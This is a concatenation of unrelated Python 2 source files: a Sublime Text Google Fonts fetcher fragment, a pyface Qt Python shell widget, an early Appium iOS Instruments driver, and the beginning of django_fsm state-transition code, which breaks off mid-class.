    def __init__(self, settings):
        # self.window = window
        self.settings = settings
        self.API_key = self.settings.get('API_key', None)
        self.script = self.settings.get('script', 'latin')
        # always defined, so handle_thread() can read thread.fonts even
        # when run() aborts early (the original crashed in that case)
        self.fonts = []
        threading.Thread.__init__(self)

    def run(self):
        """
        Called by the main class.
        Fetches the fonts from the specified URL with the API key defined in the settings.
        """
        if self.API_key is None:
            # BUG FIX: the thread has no self.view; report via the global
            # status bar instead of raising AttributeError.
            sublime.status_message('Missing Api key in the configuration file:' + __name__ + '.sublime-settings')
            return
        url = API_url + self.API_key
        fontslist = urllib.urlopen(url)
        decodedlist = json.load(fontslist)
        self.fonts = self.associate(decodedlist)
        return

    def associate(self, fontslist):
        """
        Takes the JSON list fetched from the uri and parses it into an list readable for sublimetext 2.
        """
        cnt = len(fontslist['items'])
        print('parsed:' + str(cnt))
        fonts_quickpanel_list = []
        for item in range(0, cnt):
            # keep only fonts supporting the configured subset/script
            if self.script in fontslist['items'][item]['subsets']:
                family = fontslist['items'][item]['family']
                variants = fontslist['items'][item]['variants']
                formatlist = []
                command = 'ADD F:'
                if len(variants) > 1:
                    # one aggregate entry requesting every weight at once
                    option = family + ': All Weights'
                    formatlist = [option, 'Fetch all available font types of the'+family+' font', command+family+'&W:'+','.join(variants)]
                    fonts_quickpanel_list.append(formatlist)
                for variant in variants:
                    option = family + ': ' + variant
                    formatlist = [option, 'The '+family+' font', command+family+'&W:'+variant]
                    fonts_quickpanel_list.append(formatlist)
        cnt = len(fonts_quickpanel_list)
        print('associated:' + str(cnt))
        return fonts_quickpanel_list
| |
#------------------------------------------------------------------------------
# Copyright (c) 2011, Enthought, Inc.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in enthought/LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
# Thanks for using Enthought open source!
#
# Author: Evan Patterson
#------------------------------------------------------------------------------
# Standard library imports.
import __builtin__
from code import compile_command, InteractiveInterpreter
from cStringIO import StringIO
import sys
from time import time
# System package imports.
from pyface.qt import QtCore, QtGui
from pygments.lexers import PythonLexer
# Enthought library imports.
from traits.api import Event, provides
from traits.util.clean_strings import python_name
# Local imports.
from code_editor.pygments_highlighter import PygmentsHighlighter
from console.api import BracketMatcher, CallTipWidget, CompletionLexer, \
HistoryConsoleWidget
from pyface.i_python_shell import IPythonShell, MPythonShell
from pyface.key_pressed_event import KeyPressedEvent
from widget import Widget
#-------------------------------------------------------------------------------
# 'PythonShell' class:
#-------------------------------------------------------------------------------

@provides(IPythonShell)
class PythonShell(MPythonShell, Widget):
    """ The toolkit specific implementation of a PythonShell.  See the
    IPythonShell interface for the API documentation.
    """

    #### 'IPythonShell' interface #############################################

    # Fired after a Python statement was executed in the shell.
    command_executed = Event

    # Fired on key presses in the shell widget.
    key_pressed = Event(KeyPressedEvent)

    #--------------------------------------------------------------------------
    # 'object' interface
    #--------------------------------------------------------------------------

    # FIXME v3: Either make this API consistent with other Widget sub-classes
    # or make it a sub-class of HasTraits.
    def __init__(self, parent, **traits):
        """Create the Qt control and wire up execution and drop handling."""
        super(PythonShell, self).__init__(**traits)

        # Create the toolkit-specific control that represents the widget.
        self.control = self._create_control(parent)

        # Set up to be notified whenever a Python statement is executed:
        self.control.executed.connect(self._on_command_executed)

        # Handle dropped objects.
        _DropEventEmitter(self.control).signal.connect(self._on_obj_drop)

    #--------------------------------------------------------------------------
    # 'IPythonShell' interface
    #--------------------------------------------------------------------------

    def interpreter(self):
        # The InteractiveInterpreter owned by the underlying widget.
        return self.control.interpreter

    def execute_command(self, command, hidden=True):
        # ``hidden`` suppresses echoing the command in the shell view.
        self.control.execute(command, hidden=hidden)

    def execute_file(self, path, hidden=True):
        self.control.execute_file(path, hidden=hidden)

    #--------------------------------------------------------------------------
    # 'IWidget' interface.
    #--------------------------------------------------------------------------

    def _create_control(self, parent):
        return PyfacePythonWidget(self, parent)

    #--------------------------------------------------------------------------
    # 'Private' interface.
    #--------------------------------------------------------------------------

    def _on_obj_drop(self, obj):
        """ Handle dropped objects and add to interpreter local namespace. """
        # If we can't create a valid Python identifier for the name of an
        # object we use this instead.
        name = 'dragged'

        if hasattr(obj, 'name') \
           and isinstance(obj.name, basestring) and len(obj.name) > 0:
            py_name = python_name(obj.name)

            # Make sure that the name is actually a valid Python identifier.
            # NOTE(review): eval() on a derived name is used purely as an
            # identifier check here; py_name comes from python_name(), not
            # directly from user text, but str.isidentifier() would be the
            # safer modern alternative.
            try:
                if eval(py_name, {py_name : True}):
                    name = py_name
            except Exception:
                pass

        # Bind the dropped object into the interpreter and echo its name.
        self.control.interpreter.locals[name] = obj
        self.control.execute(name)
        self.control._control.setFocus()
#-------------------------------------------------------------------------------
# 'PythonWidget' class:
#-------------------------------------------------------------------------------
class PythonWidget(HistoryConsoleWidget):
    """ A basic in-process Python interpreter.

    The widget doubles as a file-like object (write/writelines/flush/
    readline) so that sys.stdin/stdout/stderr can be pointed at it while
    code executes in the embedded InteractiveInterpreter.
    """

    # Emitted when a command has been executed in the interpreter.
    executed = QtCore.Signal()

    #--------------------------------------------------------------------------
    # 'object' interface
    #--------------------------------------------------------------------------

    def __init__(self, parent=None):
        super(PythonWidget, self).__init__(parent)

        # PythonWidget attributes.
        # 'locals' is the namespace shared with the embedded interpreter.
        self.locals = dict(__name__='__console__', __doc__=None)
        self.interpreter = InteractiveInterpreter(self.locals)

        # PythonWidget protected attributes.
        # Output is staged in '_buffer' and periodically flushed to the
        # control (see write()).
        self._buffer = StringIO()
        self._bracket_matcher = BracketMatcher(self._control)
        self._call_tip_widget = CallTipWidget(self._control)
        self._completion_lexer = CompletionLexer(PythonLexer())
        # While '_hidden' is True, write() discards all output.
        self._hidden = False
        self._highlighter = PythonWidgetHighlighter(self)
        self._last_refresh_time = 0

        # file-like object attributes.
        self.encoding = sys.stdin.encoding

        # Configure the ConsoleWidget.
        self.tab_width = 4
        self._set_continuation_prompt('... ')

        # Configure the CallTipWidget.
        self._call_tip_widget.setFont(self.font)
        self.font_changed.connect(self._call_tip_widget.setFont)

        # Connect signal handlers.
        document = self._control.document()
        document.contentsChange.connect(self._document_contents_change)

        # Display the banner and initial prompt.
        self.reset()

    #--------------------------------------------------------------------------
    # file-like object interface
    #--------------------------------------------------------------------------

    def flush(self):
        """ Flush the buffer by writing its contents to the screen.
        """
        self._buffer.seek(0)
        text = self._buffer.getvalue()
        self._buffer.close()
        # Start a fresh buffer; the old one cannot be reused once closed.
        self._buffer = StringIO()

        self._append_plain_text(text)
        self._control.moveCursor(QtGui.QTextCursor.End)

    def readline(self, prompt=None):
        """ Read and return one line of input from the user.
        """
        return self._readline(prompt)

    def write(self, text, refresh=True):
        """ Write text to the buffer, possibly flushing it if 'refresh' is set.
        """
        if not self._hidden:
            self._buffer.write(text)
            if refresh:
                # Throttle screen updates to at most one every 50 ms.
                current_time = time()
                if current_time - self._last_refresh_time > 0.05:
                    self.flush()
                    self._last_refresh_time = current_time

    def writelines(self, lines, refresh=True):
        """ Write a list of lines to the buffer.
        """
        for line in lines:
            self.write(line, refresh=refresh)

    #---------------------------------------------------------------------------
    # 'ConsoleWidget' abstract interface
    #---------------------------------------------------------------------------

    def _is_complete(self, source, interactive):
        """ Returns whether 'source' can be completely processed and a new
            prompt created. When triggered by an Enter/Return key press,
            'interactive' is True; otherwise, it is False.
        """
        if interactive:
            lines = source.splitlines()
            if len(lines) == 1:
                try:
                    return compile_command(source) is not None
                except:
                    # We'll let the interpreter handle the error.
                    return True
            else:
                # Multi-line input is complete once the user enters a
                # blank line.
                return lines[-1].strip() == ''
        else:
            return True

    def _execute(self, source, hidden):
        """ Execute 'source'. If 'hidden', do not show any output.

        See parent class :meth:`execute` docstring for full details.
        """
        # Save the current std* and point them here so the executed code's
        # I/O goes through this widget's file-like interface.
        old_stdin = sys.stdin
        old_stdout = sys.stdout
        old_stderr = sys.stderr
        sys.stdin = sys.stdout = sys.stderr = self

        # Run the source code in the interpreter
        self._hidden = hidden
        try:
            more = self.interpreter.runsource(source)
        finally:
            self._hidden = False

            # Restore std* unless the executed changed them
            if sys.stdin is self:
                sys.stdin = old_stdin
            if sys.stdout is self:
                sys.stdout = old_stdout
            if sys.stderr is self:
                sys.stderr = old_stderr

            self.executed.emit()
            self._show_interpreter_prompt()

    def _prompt_started_hook(self):
        """ Called immediately after a new prompt is displayed.
        """
        if not self._reading:
            self._highlighter.highlighting_on = True

    def _prompt_finished_hook(self):
        """ Called immediately after a prompt is finished, i.e. when some input
            will be processed and a new prompt displayed.
        """
        if not self._reading:
            self._highlighter.highlighting_on = False

    def _tab_pressed(self):
        """ Called when the tab key is pressed. Returns whether to continue
            processing the event.
        """
        # Perform tab completion if:
        # 1) The cursor is in the input buffer.
        # 2) There is a non-whitespace character before the cursor.
        text = self._get_input_buffer_cursor_line()
        if text is None:
            return False
        complete = bool(text[:self._get_input_buffer_cursor_column()].strip())
        if complete:
            self._complete()
        # Returning False suppresses the literal tab insertion.
        return not complete

    #---------------------------------------------------------------------------
    # 'ConsoleWidget' protected interface
    #---------------------------------------------------------------------------

    def _event_filter_console_keypress(self, event):
        """ Reimplemented for smart backspace.
        """
        if event.key() == QtCore.Qt.Key_Backspace and \
                not event.modifiers() & QtCore.Qt.AltModifier:

            # Smart backspace: remove four characters in one backspace if:
            # 1) everything left of the cursor is whitespace
            # 2) the four characters immediately left of the cursor are spaces
            col = self._get_input_buffer_cursor_column()
            cursor = self._control.textCursor()
            if col > 3 and not cursor.hasSelection():
                text = self._get_input_buffer_cursor_line()[:col]
                if text.endswith('    ') and not text.strip():
                    cursor.movePosition(QtGui.QTextCursor.Left,
                                        QtGui.QTextCursor.KeepAnchor, 4)
                    cursor.removeSelectedText()
                    return True

        return super(PythonWidget, self)._event_filter_console_keypress(event)

    def _insert_continuation_prompt(self, cursor):
        """ Reimplemented for auto-indentation.
        """
        super(PythonWidget, self)._insert_continuation_prompt(cursor)
        source = self.input_buffer
        # Mirror the previous line's indentation (tabs count as 4 spaces)
        # and indent one extra level after a trailing colon.
        space = 0
        for c in source.splitlines()[-1]:
            if c == '\t':
                space += 4
            elif c == ' ':
                space += 1
            else:
                break
        if source.rstrip().endswith(':'):
            space += 4
        cursor.insertText(' ' * space)

    #---------------------------------------------------------------------------
    # 'PythonWidget' public interface
    #---------------------------------------------------------------------------

    def execute_file(self, path, hidden=False):
        """ Attempts to execute file with 'path'. If 'hidden', no output is
            shown.
        """
        # NOTE: execfile() is Python 2 only.
        self.execute('execfile("%s")' % path, hidden=hidden)

    def reset(self):
        """ Resets the widget to its initial state. Similar to ``clear``, but
            also re-writes the banner.
        """
        self._reading = False
        self._highlighter.highlighting_on = False

        self._control.clear()
        self._append_plain_text(self._get_banner())
        self._show_interpreter_prompt()

    #---------------------------------------------------------------------------
    # 'PythonWidget' protected interface
    #---------------------------------------------------------------------------

    def _call_tip(self):
        """ Shows a call tip, if appropriate, at the current cursor location.
        """
        # Decide if it makes sense to show a call tip: the character just
        # left of the cursor must be an opening parenthesis.
        cursor = self._get_cursor()
        cursor.movePosition(QtGui.QTextCursor.Left)
        if cursor.document().characterAt(cursor.position()) != '(':
            return False
        context = self._get_context(cursor)
        if not context:
            return False

        # Look up the context and show a tip for it
        symbol, leftover = self._get_symbol_from_context(context)
        doc = getattr(symbol, '__doc__', None)
        if doc is not None and not leftover:
            self._call_tip_widget.show_call_info(doc=doc)
            return True
        return False

    def _complete(self):
        """ Performs completion at the current cursor location.
        """
        context = self._get_context()
        if context:
            symbol, leftover = self._get_symbol_from_context(context)
            if len(leftover) == 1:
                leftover = leftover[0]
                if symbol is None:
                    # No resolvable prefix: complete against the
                    # interpreter locals plus builtins (Python 2:
                    # keys() returns lists here).
                    names = self.interpreter.locals.keys()
                    names += __builtin__.__dict__.keys()
                else:
                    names = dir(symbol)
                completions = [ n for n in names if n.startswith(leftover) ]
                if completions:
                    cursor = self._get_cursor()
                    # Anchor the popup at the start of the partial name.
                    cursor.movePosition(QtGui.QTextCursor.Left,
                                        n=len(context[-1]))
                    self._complete_with_items(cursor, completions)

    def _get_banner(self):
        """ Gets a banner to display at the beginning of a session.
        """
        banner = 'Python %s on %s\nType "help", "copyright", "credits" or ' \
            '"license" for more information.'
        return banner % (sys.version, sys.platform)

    def _get_context(self, cursor=None):
        """ Gets the context for the specified cursor (or the current cursor
            if none is specified).
        """
        if cursor is None:
            cursor = self._get_cursor()
        # Lex everything from the start of the line up to the cursor.
        cursor.movePosition(QtGui.QTextCursor.StartOfBlock,
                            QtGui.QTextCursor.KeepAnchor)
        text = cursor.selection().toPlainText()
        return self._completion_lexer.get_context(text)

    def _get_symbol_from_context(self, context):
        """ Find a python object in the interpreter namespace from a context (a
            list of names).
        """
        context = map(str, context)
        if len(context) == 0:
            return None, context

        # Resolve the first name against locals, then builtins.
        base_symbol_string = context[0]
        symbol = self.interpreter.locals.get(base_symbol_string, None)
        if symbol is None:
            symbol = __builtin__.__dict__.get(base_symbol_string, None)
        if symbol is None:
            return None, context

        # Walk the remaining attribute chain as far as it resolves,
        # returning the unresolved tail as 'leftover'.
        context = context[1:]
        for i, name in enumerate(context):
            new_symbol = getattr(symbol, name, None)
            if new_symbol is None:
                return symbol, context[i:]
            else:
                symbol = new_symbol
        return symbol, []

    def _show_interpreter_prompt(self):
        """ Shows a prompt for the interpreter.
        """
        self.flush()
        self._show_prompt('>>> ')

    #------ Signal handlers ----------------------------------------------------

    def _document_contents_change(self, position, removed, added):
        """ Called whenever the document's content changes. Display a call tip
            if appropriate.
        """
        # Calculate where the cursor should be *after* the change:
        position += added

        # NOTE(review): 'document' is unused here.
        document = self._control.document()
        if position == self._get_cursor().position():
            self._call_tip()
#-------------------------------------------------------------------------------
# 'PythonWidgetHighlighter' class:
#-------------------------------------------------------------------------------
class PythonWidgetHighlighter(PygmentsHighlighter):
    """ A PygmentsHighlighter that can be turned on and off and that ignores
        prompts.
    """

    def __init__(self, python_widget):
        super(PythonWidgetHighlighter, self).__init__(
            python_widget._control.document())
        self._current_offset = 0
        self._python_widget = python_widget
        self.highlighting_on = False

    def highlightBlock(self, string):
        """ Highlight one block of text, skipping any leading prompt.
        """
        if not self.highlighting_on:
            return

        # The incoming string may contain paragraph break characters,
        # non-breaking spaces, etc.; fetch the plain text of the block so
        # it can be compared against the prompt strings.
        block = self.currentBlock()
        widget = self._python_widget
        text = widget._get_block_plain_text(block)

        # The block starts with either the regular prompt or a
        # continuation prompt.
        if block.contains(widget._prompt_pos):
            prompt = widget._prompt
        else:
            prompt = widget._continuation_prompt

        # Exclude the prompt itself from highlighting.
        offset = len(prompt) if text.startswith(prompt) else 0
        self._current_offset = offset
        super(PythonWidgetHighlighter, self).highlightBlock(text[offset:])

    def rehighlightBlock(self, block):
        """ Reimplemented to temporarily enable highlighting if disabled.
        """
        previous = self.highlighting_on
        self.highlighting_on = True
        super(PythonWidgetHighlighter, self).rehighlightBlock(block)
        self.highlighting_on = previous

    def setFormat(self, start, count, format):
        """ Reimplemented to shift formatting past any skipped prompt.
        """
        super(PythonWidgetHighlighter, self).setFormat(
            start + self._current_offset, count, format)
#-------------------------------------------------------------------------------
# 'PyfacePythonWidget' class:
#-------------------------------------------------------------------------------
class PyfacePythonWidget(PythonWidget):
    """ A PythonWidget customized to support the IPythonShell interface.
    """

    #--------------------------------------------------------------------------
    # 'object' interface
    #--------------------------------------------------------------------------

    def __init__(self, pyface_widget, *args, **kw):
        """ Reimplemented to store a reference to the Pyface widget which
            contains this control.
        """
        # Store the owning widget before the base class builds the control.
        self._pyface_widget = pyface_widget

        super(PyfacePythonWidget, self).__init__(*args, **kw)

    #---------------------------------------------------------------------------
    # 'QWidget' interface
    #---------------------------------------------------------------------------

    def keyPressEvent(self, event):
        """ Reimplemented to generate Pyface key press events.
        """
        # Pyface doesn't seem to be Unicode aware.  Only keep the key code
        # if it corresponds to a single Latin1 character.
        try:
            kcode = ord(str(event.text()))
        except:
            kcode = 0

        mods = event.modifiers()
        self._pyface_widget.key_pressed = KeyPressedEvent(
            alt_down=((mods & QtCore.Qt.AltModifier) ==
                      QtCore.Qt.AltModifier),
            control_down=((mods & QtCore.Qt.ControlModifier) ==
                          QtCore.Qt.ControlModifier),
            shift_down=((mods & QtCore.Qt.ShiftModifier) ==
                        QtCore.Qt.ShiftModifier),
            key_code=kcode,
            event=event)

        super(PyfacePythonWidget, self).keyPressEvent(event)
#-------------------------------------------------------------------------------
# '_DropEventFilter' class:
#-------------------------------------------------------------------------------
class _DropEventEmitter(QtCore.QObject):
    """ Re-emit object drops on a widget as a Qt signal. """

    # Emitted with the dropped object instance.
    signal = QtCore.Signal(object)

    def __init__(self, widget):
        QtCore.QObject.__init__(self, widget)
        self.widget = widget

        # Accept drops and observe the widget's events ourselves.
        widget.setAcceptDrops(True)
        widget.installEventFilter(self)

    def eventFilter(self, source, event):
        """ Accept drag-enter/drop events that carry PyMimeData instance
            data; emit the instance on drop.
        """
        event_type = event.type()
        if event_type in (QtCore.QEvent.DragEnter, QtCore.QEvent.Drop):
            mime_data = event.mimeData()
            # Only PyMimeData payloads expose an 'instance' accessor.
            if hasattr(mime_data, 'instance'):
                obj = mime_data.instance()
                if obj is not None:
                    if event_type == QtCore.QEvent.Drop:
                        self.signal.emit(obj)
                    event.accept()
                    return True

        return QtCore.QObject.eventFilter(self, source, event)
| |
# Copyright 2012 Appium Committers
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import ConfigParser
import fcntl
import glob
import os
from os.path import exists
from shutil import copy
from subprocess import call, check_output, Popen, PIPE
from tempfile import mkdtemp
from time import time, sleep
class Appium:
    """ Drives an iOS app through Apple's Instruments/UIAutomation.

    Commands are proxied to a bootstrap JavaScript via numbered files in a
    temp directory; responses are read back from the instruments process'
    stdout.  (Python 2 code: print statements, ConfigParser import.)
    """

    def __init__(self, app='', udid=None, verbose=False):
        # 'app': path to a simulator .app bundle, or a bundle id on device.
        self.app = app
        # None means "run on the simulator" (see using_simulator()).
        self.device_udid = udid
        self.verbose = verbose
        self.instruments_process = None
        # Monotonically increasing index used to name command files.
        self.command_index = -1

    def start(self):
        """ Launch Instruments against the app and wait until it responds.

        Returns True immediately if already running; otherwise returns
        None after the app answers its first (empty) command.
        """
        ## Do not start again if Instruments is already running
        if self.is_running():
            return True

        self.command_index = -1
        self.create_temp_dir()
        self.copy_files()
        self.modify_bootstrap_script()
        self.launch_instruments()
        if self.using_simulator():
            self.wait_for_simulator()
        self.wait_for_app()

    # Check if Instruments is running
    def is_running(self):
        # A live Popen handle with no exit code yet means "running".
        return self.instruments_process is not None and self.instruments_process.poll() is None

    # Check if running on the simulator or on device
    def using_simulator(self):
        return self.device_udid is None

    # Create temp dir
    def create_temp_dir(self):
        # Working directory for the bootstrap script, command files and
        # Instruments results.
        self.temp_dir = mkdtemp('', 'appium-')
        if self.verbose:
            print "temp_dir:", self.temp_dir

    # Copy files
    def copy_files(self):
        # Copy the bundled template files next to this module into the
        # temp directory.
        self.base_path = os.path.split(os.path.realpath(__file__))[0]
        source = os.path.join(self.base_path, 'template', '*.*')
        for filename in glob.glob(source):
            copy(filename, self.temp_dir)

    # Modify bootstrap script
    def modify_bootstrap_script(self):
        # Point the bootstrap script's $PATH_ROOT placeholder at the
        # temp directory so it knows where to poll for command files.
        self.bootstrap = os.path.join(self.temp_dir,'bootstrap.js')
        with open(self.bootstrap,'r') as file:
            contents = file.read()
        new_contents = contents.replace("$PATH_ROOT", self.temp_dir + '/')
        with open(self.bootstrap,'w') as file:
            file.write(new_contents)

    # Launch Instruments app
    def launch_instruments(self):
        command = ['/usr/bin/instruments', '-t',
                   os.path.join(self.temp_dir,'Automation.tracetemplate')]

        # Specify the UDID if running on device
        if not self.using_simulator():
            command.extend(['-w', self.device_udid])

        # Add the app and app arguments
        command.extend([self.app,
                        '-e', 'UIASCRIPT', self.bootstrap,
                        '-e', 'UIARESULTSPATH', self.temp_dir])

        self.instruments_process = Popen(command, stdout=PIPE, stdin=None, stderr=PIPE)
        # needed to 'read' from the stdout pipe without blocking waiting for the process to finish
        fcntl.fcntl(self.instruments_process.stdout.fileno(), fcntl.F_SETFL, os.O_NONBLOCK)
        return self.instruments_process.poll() is None # Should be True

    def simulator_state(self):
        """ Ask System Events (via AppleScript) whether the iPhone
        Simulator process exists; returns True/False, or None if the
        osascript output is unrecognized.
        """
        process_states = {'true': True,
                          'false': False}
        output = check_output(["/usr/bin/osascript", "-e",
                               "tell application \"System Events\" to (name of processes) contains \"iPhone Simulator\""])
        is_running = False
        if output:
            output = output.strip()
            is_running = process_states.get(output)
        return is_running

    def wait_for_simulator(self, timeout=30):
        """ Poll simulator_state() until it reports running or 'timeout'
        seconds elapse; returns True/False and records the result in
        self.simulator_is_running.
        """
        starttime = time()
        while time() - starttime < timeout:
            state = self.simulator_state()
            if state == True:
                self.simulator_is_running = True
                return True
            else:
                sleep(.5)
        self.simulator_is_running = False
        return False

    def wait_for_app(self):
        # When we get a response we know the app is alive.
        self.proxy('')

    # Proxy a command to the simulator
    # using a file-based inter-process communication
    # between Python and Instruments.
    def proxy(self, command, return_raw=False):
        self.write_command(command)
        response = self.read_response(return_raw)
        return response

    # Write the command to a file
    def write_command(self, command):
        # Increment the command index
        self.command_index = self.command_index + 1
        try:
            # The bootstrap script polls for '<index>-cmd.txt' files.
            filename = str(self.command_index) + '-cmd.txt'
            filepath = os.path.join(self.temp_dir, filename)
            with open(filepath,'w') as file:
                file.write(command)
        except:
            # NOTE(review): bare except hides the real error; consider
            # narrowing to IOError/OSError and logging the exception.
            print 'ERROR WRITING COMMAND'
            self.command_index = self.command_index - 1

    def read_response(self, return_raw=False):
        """ Poll the instruments stdout for a response; returns the raw
        XML string (return_raw), a list of [status, value] pairs parsed
        from <response> elements, or None on error/timeout.
        """
        # Wait up to 10 minutes for a response
        start_time = time()
        output = ''
        while time() - start_time < 600:
            try:
                # Non-blocking read (see fcntl call in launch_instruments);
                # raises IOError when no data is available yet.
                new_output = self.instruments_process.stdout.read()
                new_output = new_output.rstrip('*').lstrip('*') # remove buffer-flusher characters
                if self.verbose:
                    print new_output
                output += new_output
                if "Fail: The target application appears to have died" in output:
                    return
                if "Script threw an uncaught JavaScript error:" in output:
                    print output
                    return
                if "END INSTRUCTION SET #" not in output:
                    sleep(0.1)
                    continue
                # The payload sits between the response marker and the
                # end-of-instruction-set marker.
                xml = output.split('END INSTRUCTION SET #')[0].split('_APPIUM_XML_RESPONSE:')[1]
                if self.verbose:
                    print "got response in", time() - start_time
                if return_raw:
                    return xml
                else:
                    results = []
                    for item in xml.split('<response>')[1:]:
                        results.append(item.split('</response>')[0].split(',',1))
                    return results
            except IOError:
                pass
            sleep(0.1) # relieve the cpu a little

    def stop(self):
        """ Shut down Instruments (politely, then by force) and quit the
        iOS Simulator.
        """
        if not self.is_running():
            return

        # Tell Instruments to shut down (nicely)
        self.proxy('runLoop=false;')
        # Kill Instruments if it's not being nice
        start_time = time()
        while (time() - start_time < 15 and self.instruments_process.poll() == None):
            sleep(1)
        numRetry = 10
        while (numRetry >= 0 and self.instruments_process.poll() is None):
            self.instruments_process.terminate()
            sleep(1)
            numRetry = numRetry - 1
        if self.instruments_process.poll() is None:
            raise Exception('instruments process did not finish')
        # Kill iOS Simulator
        call("""/usr/bin/osascript -e 'tell app "iPhone Simulator" to quit'""", shell=True)
        sleep(2) # give it some extra time
        self.simulator_is_running = False
if __name__ == '__main__':
    # Command-line entry point: start an interactive UIAutomation
    # interpreter against the given app (simulator) or bundle id (device).
    from interpreter import launch
    import argparse

    parser = argparse.ArgumentParser(description='An interpreter for sending raw UIAutomation javascript commands to the simulator or a device')
    parser.add_argument('app', type=str, help='path to simulators .app file or the bundle_id of the desired target on device')
    parser.add_argument('-v', dest='verbose', action="store_true", default=False, help='verbose mode')
    parser.add_argument('-U', '--UDID', type=str, help='unique device identifier of the SUT')
    args = parser.parse_args()
    launch(args.app, args.UDID, args.verbose)
| |
# -*- coding: utf-8 -*-
# pylint: disable=W0212, R0904
"""
State tracking functionality for django models
"""
from collections import defaultdict
from functools import wraps
from django.db import models
from django.utils.functional import curry
from django_fsm.signals import pre_transition, post_transition
# South support; see http://south.aeracode.org/docs/tutorial/part4.html#simple-inheritance
try:
from south.modelsinspector import add_introspection_rules
except ImportError:
pass
else:
add_introspection_rules([], [r"^django_fsm\.db\.fields\.fsmfield\.FSMField"])
add_introspection_rules([], [r"^django_fsm\.db\.fields\.fsmfield\.FSMKeyField"])
class TransitionNotAllowed(Exception):
    """Raised when a transition is attempted from a state that does not
    allow it (no registered transition, or unmet conditions)."""
class FSMMeta(object):
    """
    Models methods transitions meta information.

    Attached to transition methods (as ``_django_fsm``) by the
    ``transition`` decorator; maps source states to target states and to
    the condition callables guarding them.
    """

    def __init__(self, field=None):
        # The FSMField/FSMKeyField this meta belongs to; discovered
        # lazily from the instance when not given.
        self.field = field
        # source state -> target state
        self.transitions = defaultdict()
        # source state -> list of condition callables
        self.conditions = defaultdict()

    def add_transition(self, source, target, conditions=None):
        """Register a transition from ``source`` to ``target``.

        ``conditions`` is an optional list of callables taking the model
        instance and returning a truthy/falsy value.  Raises
        AssertionError on a duplicate ``source``.
        """
        if source in self.transitions:
            raise AssertionError('Duplicate transition for %s state' % source)
        self.transitions[source] = target
        # Default handled here to avoid a shared mutable default argument.
        self.conditions[source] = conditions if conditions is not None else []

    def _get_state_field(self, instance):
        """
        Lookup for FSMField in django model instance.

        Raises TypeError when zero or more than one FSM field is found.
        """
        if not self.field:
            fields = [field for field in instance._meta.fields
                      if isinstance(field, (FSMField, FSMKeyField))]
            found = len(fields)
            if found == 0:
                raise TypeError("No FSMField found in model")
            elif found > 1:
                raise TypeError("More than one FSMField found in model")
            self.field = fields[0]
        return self.field

    def current_state(self, instance):
        """
        Return current state of Django model.
        """
        field_name = self._get_state_field(instance).name
        return getattr(instance, field_name)

    def next_state(self, instance):
        """Return the target state for the instance's current state,
        falling back to the wildcard '*' transition (KeyError if neither
        is registered)."""
        curr_state = self.current_state(instance)
        try:
            return self.transitions[curr_state]
        except KeyError:
            return self.transitions['*']

    def has_transition(self, instance):
        """
        Lookup if any transition exists from current model state.
        """
        # dict.has_key() is deprecated (and removed in Python 3); use 'in'.
        return self.current_state(instance) in self.transitions \
            or '*' in self.transitions

    def conditions_met(self, instance):
        """
        Check if all conditions have been met.
        """
        state = self.current_state(instance)
        if state not in self.conditions:
            state = '*'
        return all(condition(instance) for condition in self.conditions[state])

    def to_next_state(self, instance):
        """
        Switch the instance to its next state (bypassing the protected-
        field descriptor by writing to __dict__ directly).
        """
        field_name = self._get_state_field(instance).name
        state = self.next_state(instance)
        if state:
            instance.__dict__[field_name] = state
def transition(field=None, source='*', target=None, save=False, conditions=[]):
    """
    Method decorator for mark allowed transition.

    Set target to None if current state need to be validated and not
    changed after function call.

    'source' may be a single state, a list/tuple of states, or '*'.
    When 'save' is True the instance is saved after the state change.
    (Python 2 code: uses func.func_name.)
    """
    # pylint: disable=C0111
    def inner_transition(func):
        # Only wrap the function once; stacked @transition decorators
        # reuse the existing wrapper and just register more transitions.
        if not hasattr(func, '_django_fsm'):
            setattr(func, '_django_fsm', FSMMeta(field=field))

            @wraps(func)
            def _change_state(instance, *args, **kwargs):
                meta = func._django_fsm
                if not (meta.has_transition(instance) and meta.conditions_met(instance)):
                    raise TransitionNotAllowed("Can't switch from state '%s' using method '%s'" % (meta.current_state(instance), func.func_name))

                source_state = meta.current_state(instance)

                # Signal before the wrapped method runs...
                pre_transition.send(
                    sender = instance.__class__,
                    instance = instance,
                    name = func.func_name,
                    source = source_state,
                    target = meta.next_state(instance))

                result = func(instance, *args, **kwargs)

                # ...then advance the state and signal afterwards.
                meta.to_next_state(instance)
                if save:
                    instance.save()

                post_transition.send(
                    sender = instance.__class__,
                    instance = instance,
                    name = func.func_name,
                    source = source_state,
                    target = meta.current_state(instance))
                return result
        else:
            _change_state = func

        if isinstance(source, (list, tuple)):
            for state in source:
                func._django_fsm.add_transition(state, target, conditions)
        else:
            func._django_fsm.add_transition(source, target, conditions)
        if field:
            field.transitions.append(_change_state)
        return _change_state
    return inner_transition
def can_proceed(bound_method):
    """
    Returns True if model in state allows to call bound_method.

    Raises TypeError if 'bound_method' was not decorated with
    @transition.  (Python 2 code: uses im_func/im_self.)
    """
    meta = getattr(bound_method, '_django_fsm', None)
    if meta is None:
        raise TypeError('%s method is not transition' % bound_method.im_func.__name__)

    instance = bound_method.im_self
    return meta.has_transition(instance) and meta.conditions_met(instance)
def get_available_FIELD_transitions(instance, field):
    """
    Return (target_state, transition_method) pairs for every transition
    of 'field' that may be performed from the instance's current state.
    """
    current = getattr(instance, field.name)
    available = []
    for method in field.transitions:
        meta = method._django_fsm
        if not (meta.has_transition(instance) and meta.conditions_met(instance)):
            continue
        # Prefer an exact-state transition, falling back to wildcard.
        try:
            target = meta.transitions[current]
        except KeyError:
            target = meta.transitions['*']
        available.append((target, method))
    return available
class FSMFieldDescriptor(object):
    """Data descriptor guarding access to an FSM state attribute."""

    def __init__(self, field):
        self.field = field

    def __get__(self, obj, type=None):
        # Class-level access has no per-instance state to return.
        if obj is None:
            raise AttributeError('Can only be accessed via an instance.')
